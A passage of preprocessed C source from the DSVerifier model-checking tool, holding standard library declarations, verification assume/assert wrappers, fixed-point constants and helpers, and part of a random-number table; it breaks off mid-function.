extern long int labs (long int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
__extension__ extern long long int llabs (long long int __x)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern div_t div (int __numer, int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern ldiv_t ldiv (long int __numer, long int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
__extension__ extern lldiv_t lldiv (long long int __numer,
long long int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
# 872 "/usr/include/stdlib.h" 3 4
extern char *ecvt (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *fcvt (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *gcvt (double __value, int __ndigit, char *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ;
extern char *qecvt (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *qfcvt (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *qgcvt (long double __value, int __ndigit, char *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ;
extern int ecvt_r (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign, char *__restrict __buf,
size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int fcvt_r (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign, char *__restrict __buf,
size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int qecvt_r (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign,
char *__restrict __buf, size_t __len)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int qfcvt_r (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign,
char *__restrict __buf, size_t __len)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int mblen (const char *__s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern int mbtowc (wchar_t *__restrict __pwc,
const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern int wctomb (char *__s, wchar_t __wchar) __attribute__ ((__nothrow__ , __leaf__));
extern size_t mbstowcs (wchar_t *__restrict __pwcs,
const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern size_t wcstombs (char *__restrict __s,
const wchar_t *__restrict __pwcs, size_t __n)
__attribute__ ((__nothrow__ , __leaf__));
extern int rpmatch (const char *__response) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 957 "/usr/include/stdlib.h" 3 4
extern int getsubopt (char **__restrict __optionp,
char *const *__restrict __tokens,
char **__restrict __valuep)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2, 3))) ;
# 1003 "/usr/include/stdlib.h" 3 4
extern int getloadavg (double __loadavg[], int __nelem)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 1013 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdlib-float.h" 1 3 4
# 1014 "/usr/include/stdlib.h" 2 3 4
# 1023 "/usr/include/stdlib.h" 3 4
# 18 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 1 "/usr/include/assert.h" 1 3 4
# 66 "/usr/include/assert.h" 3 4
extern void __assert_fail (const char *__assertion, const char *__file,
unsigned int __line, const char *__function)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void __assert_perror_fail (int __errnum, const char *__file,
unsigned int __line, const char *__function)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void __assert (const char *__assertion, const char *__file, int __line)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 1 "/usr/include/stdio.h" 1 3 4
# 27 "/usr/include/stdio.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 28 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 34 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdarg.h" 1 3 4
# 40 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdarg.h" 3 4
typedef __builtin_va_list __gnuc_va_list;
# 37 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 1 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 1 3 4
# 13 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 3 4
typedef struct
{
int __count;
union
{
unsigned int __wch;
char __wchb[4];
} __value;
} __mbstate_t;
# 6 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 2 3 4
typedef struct _G_fpos_t
{
__off_t __pos;
__mbstate_t __state;
} __fpos_t;
# 40 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 3 4
typedef struct _G_fpos64_t
{
__off64_t __pos;
__mbstate_t __state;
} __fpos64_t;
# 41 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h" 1 3 4
struct _IO_FILE;
typedef struct _IO_FILE __FILE;
# 42 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/FILE.h" 1 3 4
struct _IO_FILE;
typedef struct _IO_FILE FILE;
# 43 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 1 3 4
# 35 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 3 4
struct _IO_FILE;
struct _IO_marker;
struct _IO_codecvt;
struct _IO_wide_data;
typedef void _IO_lock_t;
struct _IO_FILE
{
int _flags;
char *_IO_read_ptr;
char *_IO_read_end;
char *_IO_read_base;
char *_IO_write_base;
char *_IO_write_ptr;
char *_IO_write_end;
char *_IO_buf_base;
char *_IO_buf_end;
char *_IO_save_base;
char *_IO_backup_base;
char *_IO_save_end;
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
int _flags2;
__off_t _old_offset;
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock;
__off64_t _offset;
struct _IO_codecvt *_codecvt;
struct _IO_wide_data *_wide_data;
struct _IO_FILE *_freeres_list;
void *_freeres_buf;
size_t __pad5;
int _mode;
char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};
# 44 "/usr/include/stdio.h" 2 3 4
# 52 "/usr/include/stdio.h" 3 4
typedef __gnuc_va_list va_list;
# 84 "/usr/include/stdio.h" 3 4
typedef __fpos_t fpos_t;
# 133 "/usr/include/stdio.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h" 1 3 4
# 134 "/usr/include/stdio.h" 2 3 4
extern FILE *stdin;
extern FILE *stdout;
extern FILE *stderr;
extern int remove (const char *__filename) __attribute__ ((__nothrow__ , __leaf__));
extern int rename (const char *__old, const char *__new) __attribute__ ((__nothrow__ , __leaf__));
extern int renameat (int __oldfd, const char *__old, int __newfd,
const char *__new) __attribute__ ((__nothrow__ , __leaf__));
# 173 "/usr/include/stdio.h" 3 4
extern FILE *tmpfile (void) ;
# 187 "/usr/include/stdio.h" 3 4
extern char *tmpnam (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ;
extern char *tmpnam_r (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ;
# 204 "/usr/include/stdio.h" 3 4
extern char *tempnam (const char *__dir, const char *__pfx)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) ;
extern int fclose (FILE *__stream);
extern int fflush (FILE *__stream);
# 227 "/usr/include/stdio.h" 3 4
extern int fflush_unlocked (FILE *__stream);
# 246 "/usr/include/stdio.h" 3 4
extern FILE *fopen (const char *__restrict __filename,
const char *__restrict __modes) ;
extern FILE *freopen (const char *__restrict __filename,
const char *__restrict __modes,
FILE *__restrict __stream) ;
# 279 "/usr/include/stdio.h" 3 4
extern FILE *fdopen (int __fd, const char *__modes) __attribute__ ((__nothrow__ , __leaf__)) ;
# 292 "/usr/include/stdio.h" 3 4
extern FILE *fmemopen (void *__s, size_t __len, const char *__modes)
__attribute__ ((__nothrow__ , __leaf__)) ;
extern FILE *open_memstream (char **__bufloc, size_t *__sizeloc) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void setbuf (FILE *__restrict __stream, char *__restrict __buf) __attribute__ ((__nothrow__ , __leaf__));
extern int setvbuf (FILE *__restrict __stream, char *__restrict __buf,
int __modes, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern void setbuffer (FILE *__restrict __stream, char *__restrict __buf,
size_t __size) __attribute__ ((__nothrow__ , __leaf__));
extern void setlinebuf (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int fprintf (FILE *__restrict __stream,
const char *__restrict __format, ...);
extern int printf (const char *__restrict __format, ...);
extern int sprintf (char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__));
extern int vfprintf (FILE *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg);
extern int vprintf (const char *__restrict __format, __gnuc_va_list __arg);
extern int vsprintf (char *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg) __attribute__ ((__nothrow__));
extern int snprintf (char *__restrict __s, size_t __maxlen,
const char *__restrict __format, ...)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 4)));
extern int vsnprintf (char *__restrict __s, size_t __maxlen,
const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 0)));
# 379 "/usr/include/stdio.h" 3 4
extern int vdprintf (int __fd, const char *__restrict __fmt,
__gnuc_va_list __arg)
__attribute__ ((__format__ (__printf__, 2, 0)));
extern int dprintf (int __fd, const char *__restrict __fmt, ...)
__attribute__ ((__format__ (__printf__, 2, 3)));
extern int fscanf (FILE *__restrict __stream,
const char *__restrict __format, ...) ;
extern int scanf (const char *__restrict __format, ...) ;
extern int sscanf (const char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__ , __leaf__));
extern int fscanf (FILE *__restrict __stream, const char *__restrict __format, ...) __asm__ ("" "__isoc99_fscanf")
;
extern int scanf (const char *__restrict __format, ...) __asm__ ("" "__isoc99_scanf")
;
extern int sscanf (const char *__restrict __s, const char *__restrict __format, ...) __asm__ ("" "__isoc99_sscanf") __attribute__ ((__nothrow__ , __leaf__))
;
# 432 "/usr/include/stdio.h" 3 4
extern int vfscanf (FILE *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg)
__attribute__ ((__format__ (__scanf__, 2, 0))) ;
extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__format__ (__scanf__, 1, 0))) ;
extern int vsscanf (const char *__restrict __s,
const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__format__ (__scanf__, 2, 0)));
extern int vfscanf (FILE *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vfscanf")
__attribute__ ((__format__ (__scanf__, 2, 0))) ;
extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vscanf")
__attribute__ ((__format__ (__scanf__, 1, 0))) ;
extern int vsscanf (const char *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vsscanf") __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__format__ (__scanf__, 2, 0)));
# 485 "/usr/include/stdio.h" 3 4
extern int fgetc (FILE *__stream);
extern int getc (FILE *__stream);
extern int getchar (void);
extern int getc_unlocked (FILE *__stream);
extern int getchar_unlocked (void);
# 510 "/usr/include/stdio.h" 3 4
extern int fgetc_unlocked (FILE *__stream);
# 521 "/usr/include/stdio.h" 3 4
extern int fputc (int __c, FILE *__stream);
extern int putc (int __c, FILE *__stream);
extern int putchar (int __c);
# 537 "/usr/include/stdio.h" 3 4
extern int fputc_unlocked (int __c, FILE *__stream);
extern int putc_unlocked (int __c, FILE *__stream);
extern int putchar_unlocked (int __c);
extern int getw (FILE *__stream);
extern int putw (int __w, FILE *__stream);
extern char *fgets (char *__restrict __s, int __n, FILE *__restrict __stream)
;
# 603 "/usr/include/stdio.h" 3 4
extern __ssize_t __getdelim (char **__restrict __lineptr,
size_t *__restrict __n, int __delimiter,
FILE *__restrict __stream) ;
extern __ssize_t getdelim (char **__restrict __lineptr,
size_t *__restrict __n, int __delimiter,
FILE *__restrict __stream) ;
extern __ssize_t getline (char **__restrict __lineptr,
size_t *__restrict __n,
FILE *__restrict __stream) ;
extern int fputs (const char *__restrict __s, FILE *__restrict __stream);
extern int puts (const char *__s);
extern int ungetc (int __c, FILE *__stream);
extern size_t fread (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) ;
extern size_t fwrite (const void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __s);
# 673 "/usr/include/stdio.h" 3 4
extern size_t fread_unlocked (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) ;
extern size_t fwrite_unlocked (const void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream);
extern int fseek (FILE *__stream, long int __off, int __whence);
extern long int ftell (FILE *__stream) ;
extern void rewind (FILE *__stream);
# 707 "/usr/include/stdio.h" 3 4
extern int fseeko (FILE *__stream, __off_t __off, int __whence);
extern __off_t ftello (FILE *__stream) ;
# 731 "/usr/include/stdio.h" 3 4
extern int fgetpos (FILE *__restrict __stream, fpos_t *__restrict __pos);
extern int fsetpos (FILE *__stream, const fpos_t *__pos);
# 757 "/usr/include/stdio.h" 3 4
extern void clearerr (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int feof (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ferror (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void clearerr_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int feof_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ferror_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void perror (const char *__s);
# 1 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 1 3 4
# 26 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 3 4
extern int sys_nerr;
extern const char *const sys_errlist[];
# 782 "/usr/include/stdio.h" 2 3 4
extern int fileno (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int fileno_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
# 800 "/usr/include/stdio.h" 3 4
extern FILE *popen (const char *__command, const char *__modes) ;
extern int pclose (FILE *__stream);
extern char *ctermid (char *__s) __attribute__ ((__nothrow__ , __leaf__));
# 840 "/usr/include/stdio.h" 3 4
extern void flockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int ftrylockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void funlockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
# 858 "/usr/include/stdio.h" 3 4
extern int __uflow (FILE *);
extern int __overflow (FILE *, int);
# 873 "/usr/include/stdio.h" 3 4
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
void __DSVERIFIER_assume(_Bool expression){
__CPROVER_assume(expression);
}
void __DSVERIFIER_assert(_Bool expression){
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
((void) sizeof ((
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ; else __assert_fail (
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
"expression"
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h", 36, __extension__ __PRETTY_FUNCTION__); }))
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
;
}
void __DSVERIFIER_assert_msg(_Bool expression, char * msg){
printf("%s", msg);
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
((void) sizeof ((
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ; else __assert_fail (
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
"expression"
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h", 41, __extension__ __PRETTY_FUNCTION__); }))
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
;
}
# 22 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 1
# 27 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 1 3 4
# 9 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 3 4
# 1 "/usr/include/stdint.h" 1 3 4
# 26 "/usr/include/stdint.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 27 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wchar.h" 1 3 4
# 29 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 30 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4
typedef __uint8_t uint8_t;
typedef __uint16_t uint16_t;
typedef __uint32_t uint32_t;
typedef __uint64_t uint64_t;
# 38 "/usr/include/stdint.h" 2 3 4
typedef __int_least8_t int_least8_t;
typedef __int_least16_t int_least16_t;
typedef __int_least32_t int_least32_t;
typedef __int_least64_t int_least64_t;
typedef __uint_least8_t uint_least8_t;
typedef __uint_least16_t uint_least16_t;
typedef __uint_least32_t uint_least32_t;
typedef __uint_least64_t uint_least64_t;
typedef signed char int_fast8_t;
typedef long int int_fast16_t;
typedef long int int_fast32_t;
typedef long int int_fast64_t;
# 71 "/usr/include/stdint.h" 3 4
typedef unsigned char uint_fast8_t;
typedef unsigned long int uint_fast16_t;
typedef unsigned long int uint_fast32_t;
typedef unsigned long int uint_fast64_t;
# 87 "/usr/include/stdint.h" 3 4
typedef long int intptr_t;
typedef unsigned long int uintptr_t;
# 101 "/usr/include/stdint.h" 3 4
typedef __intmax_t intmax_t;
typedef __uintmax_t uintmax_t;
# 10 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 2 3 4
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 2
# 1 "/usr/include/inttypes.h" 1 3 4
# 34 "/usr/include/inttypes.h" 3 4
typedef int __gwchar_t;
# 266 "/usr/include/inttypes.h" 3 4
typedef struct
{
long int quot;
long int rem;
} imaxdiv_t;
# 290 "/usr/include/inttypes.h" 3 4
extern intmax_t imaxabs (intmax_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern imaxdiv_t imaxdiv (intmax_t __numer, intmax_t __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern intmax_t strtoimax (const char *__restrict __nptr,
char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__));
extern uintmax_t strtoumax (const char *__restrict __nptr,
char ** __restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__));
extern intmax_t wcstoimax (const __gwchar_t *__restrict __nptr,
__gwchar_t **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__));
extern uintmax_t wcstoumax (const __gwchar_t *__restrict __nptr,
__gwchar_t ** __restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__));
# 432 "/usr/include/inttypes.h" 3 4
# 29 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 2
# 30 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
extern implementation impl;
typedef int64_t fxp_t;
fxp_t _fxp_one;
fxp_t _fxp_half;
fxp_t _fxp_minus_one;
fxp_t _fxp_min;
fxp_t _fxp_max;
double _dbl_max;
double _dbl_min;
fxp_t _fxp_fmask;
fxp_t _fxp_imask;
static const double scale_factor[31] = { 1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0,
128.0, 256.0, 512.0, 1024.0, 2048.0, 4096.0, 8192.0, 16384.0, 32768.0,
65536.0, 131072.0, 262144.0, 524288.0, 1048576.0, 2097152.0, 4194304.0,
8388608.0, 16777216.0, 33554432.0, 67108864.0, 134217728.0,
268435456.0, 536870912.0, 1073741824.0 };
static const double scale_factor_inv[31] = { 1.0, 0.5, 0.25, 0.125, 0.0625,
0.03125, 0.015625, 0.0078125, 0.00390625, 0.001953125, 0.0009765625,
0.00048828125, 0.000244140625, 0.0001220703125, 0.00006103515625,
0.000030517578125, 0.000015258789063, 0.000007629394531,
0.000003814697266, 0.000001907348633, 0.000000953674316,
0.000000476837158, 0.000000238418579, 0.000000119209290,
0.000000059604645, 0.000000029802322, 0.000000014901161,
0.000000007450581, 0.000000003725290, 0.000000001862645,
0.000000000931323 };
static const float rand_uni[10000] = { -0.486240329978498f, -0.0886462298529236f, -0.140307596103306f, 0.301096597450952f, 0.0993171079928659f, 0.971751769763271f, 0.985173975730828f, 0.555993645184930f, 0.582088652691427f, -0.153377496651175f, 0.383610009058905f, -0.335724126391271f, 0.978768141636516f, -0.276250018648572f, 0.390075705739569f, -0.179022404038782f, 0.690083827115783f, -0.872530132490992f, -0.970585763293203f, -0.581476053441704f, -0.532614615674888f, -0.239699306693312f, -0.678183014035494f, 0.349502640932782f, -0.210469890686263f, 0.841262085391842f, -0.473585465151401f, 0.659383565443701f, -0.651160036945754f, -0.961043527561335f, -0.0814927639199137f, 0.621303110569702f, -0.784529166943541f, 0.0238464770757800f, 0.392694728594110f, 0.776848735202001f, 0.0870059709310509f, 0.880563655271790f, 0.883457036977564f, -0.249235082877382f, -0.691040749216870f, 0.578731120064320f, -0.973932858000832f, -0.117699105431720f, -0.723831748151088f, -0.483149657477524f, -0.821277691383664f, -0.459725618100875f, 0.148175952221864f, 0.444306875534854f, -0.325610376336498f, 0.544142311404910f, -0.165319440455435f, 0.136706800705517f, 0.543312481350682f, 0.467210959764607f, -0.349266618228534f, -0.660110730565862f, 0.910332331495431f, 0.961049802789367f, -0.786168905164629f, 0.305648402726554f, 0.510815258508885f, 0.0950733260984060f, 0.173750645487898f, 0.144488668408672f, 0.0190031984466126f, -0.299194577636724f, 0.302411647442273f, -0.730462524226212f, 0.688646006554796f, 0.134948379722118f, 0.533716723458894f, -0.00226300779660438f, -0.561340777806718f, 0.450396313744017f, -0.569445876566955f, 0.954155246557698f, -0.255403882430676f, -0.759820984120828f, -0.855279790307514f, -0.147352581758156f, -0.302269055643746f, -0.642038024364086f, -0.367405981107491f, 0.491844011712164f, -0.542191710121194f, -0.938294043323732f, 0.683979894338020f, 0.294728290855287f, 0.00662691839443919f, -0.931040350582855f, 0.152356209974418f, 0.678620860551457f, -0.534989269238408f, 0.932096367913226f, -0.0361062818028513f, -0.847189697149530f, -0.975903030160255f, 0.623293205784014f, -0.661289688031659f, 0.724486055119603f, 0.307504095172835f, 0.00739266163731767f, -0.393681596442097f, 0.0313739422974388f, 0.0768157689673350f, -0.652063346886817f, 0.864188030044388f, -0.588932092781034f, 0.496015896758580f, -0.872858269231211f, 0.978780599551039f, -0.504887732991147f, -0.462378791937628f, 0.0141726829338038f, 0.769610007653591f, 0.945233033188923f, -0.782235375325016f, -0.832206533738799f, 0.745634368088673f, -0.696969510157151f, -0.0674631869948374f, -0.123186450806584f, -0.359158959141949f, -0.393882649464391f, 0.441371446689899f, -0.829394270569736f, -0.301502651277431f, -0.996215501187289f, 0.934634037393066f, -0.282431114746289f, -0.927550795619590f, -0.437037530043415f, -0.360426812995980f, 0.949549724575862f, 0.502784616197919f, 0.800771681422909f, -0.511398929004089f, 0.309288504642554f, -0.207261227890933f, 0.930587995125773f, -0.777029876696670f, -0.489329175755640f, -0.134595132329858f, 0.285771358983518f, 0.182331373854387f, -0.544110494560697f, 0.278439882883985f, -0.556325158102182f, 0.579043806545889f, 0.134648133801916f, 0.602850725479294f, -0.151663563868883f, 0.180694361855878f, -0.651591295315595f, 0.281129147768056f, -0.580047306475484f, 0.687883075491433f, 0.279398670804288f, -0.853428128249503f, -0.532609367372680f, -0.821156786377917f, -0.181273229058573f, -0.983898569846882f, -0.0964374318311501f, 0.880923372124250f, 0.102643371392389f, 0.893615387135596f, -0.259276649383649f, 0.699287743639363f, 0.402940604635828f, -0.110721596226581f, 0.0846246472582877f, 0.820733021865405f, 0.795578903285308f, -0.495144122011537f, 0.273150029257472f, -0.268249949701437f, 0.231982193341980f, 0.694211299124074f, 0.859950868718233f, 0.959483382623794f, -0.422972626833543f, -0.109621798738360f, 0.433094703426531f, 0.694025903378851f, 0.374478987547435f, -0.293668545105608f, -0.396213864190828f, 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# 102 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t wrap(fxp_t kX, fxp_t kLowerBound, fxp_t kUpperBound)
{
int32_t range_size = kUpperBound - kLowerBound + 1;
if (kX < kLowerBound){
kX += range_size * ((kLowerBound - kX) / range_size + 1);
}
return kLowerBound + (kX - kLowerBound) % range_size;
}
fxp_t fxp_get_int_part(fxp_t in) {
return ((in < 0) ? -((-in) & _fxp_imask) : in & _fxp_imask);
}
fxp_t fxp_get_frac_part(fxp_t in) {
return ((in < 0) ? -((-in) & _fxp_fmask) : in & _fxp_fmask);
}
float fxp_to_float(fxp_t fxp);
fxp_t fxp_quantize(fxp_t aquant) {
if (overflow_mode == 2) {
if(aquant < _fxp_min) {
return _fxp_min;
}
else if(aquant > _fxp_max) {
return _fxp_max;
}
}
else if (overflow_mode == 3) {
if(aquant < _fxp_min || aquant > _fxp_max) {
return wrap(aquant, _fxp_min, _fxp_max);
}
}
return (fxp_t) aquant;
}
void fxp_verify_overflow(fxp_t value){
